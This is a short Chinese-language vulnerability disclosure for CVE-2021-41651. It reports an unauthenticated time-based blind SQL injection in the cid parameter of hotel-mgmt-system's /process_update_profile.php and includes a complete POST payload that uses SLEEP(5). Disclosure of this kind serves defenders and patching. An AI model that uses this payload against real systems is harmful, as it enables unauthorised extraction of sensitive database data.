CVE-2021-41651 hotel-mgmt-system 中的 SQL 注入漏洞
hotel-mgmt-system 存在未认证的基于时间的盲注 SQL 注入漏洞。
/process_update_profile.php 页面中的 cid 参数未对用户输入进行过滤,攻击者可提取底层 MySQL 数据库中的敏感数据。
URL: /process_update_profile.php
参数:cid
参数:cid(自定义)POST
类型:基于时间的盲注
标题:MySQL >= 5.0.12 AND 基于时间的盲注 (query SLEEP)
载荷:phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Jason Colyvas
MOBIUSBINARY
2021年9月23日